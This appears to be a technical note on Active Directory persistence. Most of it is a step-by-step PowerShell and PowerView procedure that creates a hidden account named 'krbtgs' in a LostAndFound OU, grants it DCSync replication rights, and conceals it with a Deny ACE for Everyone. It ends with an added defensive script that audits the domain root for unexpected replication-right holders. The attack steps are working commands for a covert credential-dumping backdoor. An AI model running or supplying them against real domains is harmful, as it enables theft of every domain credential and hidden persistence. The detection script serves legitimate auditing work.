Import Active Directory module:
Import-Module .\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Create a new OU called System inside the LostAndFound container (as Domain Admin!):
New-ADOrganizationalUnit -Name "System" -Path "CN=LostAndFound,DC=domain,DC=domain,DC=domain" -Verbose
Even though the PowerShell command seems to return an error, the System OU is still created.
Create a new user called krbtgs inside the newly created System OU:
New-ADUser -Name "krbtgs" -SamAccountName "krbtgs" -Path "OU=System,CN=LostAndFound,DC=domain,DC=domain,DC=domain" -AccountPassword(Read-Host -AsSecureString "Input Password") -Enabled $true
Change the owner of the newly created user account, making the account its own owner (using PowerView):
Set-DomainObjectOwner -Identity krbtgs -OwnerIdentity krbtgs -Verbose
Assign to it DCSync rights (using PowerView):
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=domain,DC=domain" -PrincipalIdentity krbtgs -Rights DCSync -PrincipalDomain <domain> -TargetDomain <domain> -Verbose
Create raw objects in order to hide the user account:
$user=Get-DomainUser krbtgs
$UserOU = $user.distinguishedName.Substring($user.distinguishedName.IndexOf("OU="))
$RawObject = Get-DomainOU -Raw -Identity $UserOU
$TargetObject = $RawObject.GetDirectoryEntry()
$RawUser = Get-DomainUser -Raw -Identity krbtgs
$TargetUser = $RawUser.GetDirectoryEntry()
Create an ACE that denies Everyone (S-1-1-0) the GenericAll right on this user:
$Ace = New-AdObjectAccessControlEntry -InheritanceType All -AccessControlType Deny -PrincipalIdentity "S-1-1-0" -Right GenericAll
$TargetUser.PSBase.ObjectSecurity.AddAccessRule($Ace)
$TargetUser.PSBase.CommitChanges()
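The DCSync grant made above is recorded in the DACL of the domain root object, not on the user object that the Deny ACE covers, so it can be audited from there. The following is an added defensive example, not part of the original page: it lists every principal holding replication rights on the domain root that is not on an expected list. The RSAT ActiveDirectory module and the contents of `$expectedSids` are assumptions to adjust per environment.

```powershell
# Added defensive example, not from the original page.
# Assumes the RSAT ActiveDirectory module (provides the AD: drive for Get-Acl).
Import-Module ActiveDirectory

$domain    = Get-ADDomain
$domainSid = $domain.DomainSID.Value

# Control access rights that permit directory replication (DCSync).
$replicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    '00000000-0000-0000-0000-000000000000' = 'All extended rights'
}

# Assumption: SIDs expected to hold these rights; tune for your environment.
# SYSTEM, Enterprise DCs, BUILTIN\Administrators, then domain RIDs 498
# (Enterprise RODCs), 512 (Domain Admins), 516 (DCs), 519 (Enterprise Admins,
# which only matches when run in the forest root domain).
$expectedSids = @('S-1-5-18', 'S-1-5-9', 'S-1-5-32-544') +
    (498, 512, 516, 519 | ForEach-Object { "$domainSid-$_" })

# Read the domain root DACL with trustees returned as raw SIDs.
$acl   = Get-Acl -Path "AD:\$($domain.DistinguishedName)"
$rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])

$findings = foreach ($rule in $rules) {
    $isExtended = $rule.ActiveDirectoryRights -band
        [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $right = $replicationRights[$rule.ObjectType.ToString()]
    $sid   = $rule.IdentityReference.Value
    if ($rule.AccessControlType -ne 'Allow' -or -not $isExtended -or
        -not $right -or $expectedSids -contains $sid) { continue }

    # A SID that does not resolve to a name is reported as-is, not dropped.
    try   { $name = $rule.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $name = '<unresolved>' }

    [pscustomobject]@{ Sid = $sid; Name = $name; Right = $right; Inherited = $rule.IsInherited }
}

$findings | Sort-Object Sid, Right | Format-Table -AutoSize
```

Entries that remain are candidates for review rather than verdicts; a legitimate holder such as a directory synchronization service account should be added to `$expectedSids` once confirmed.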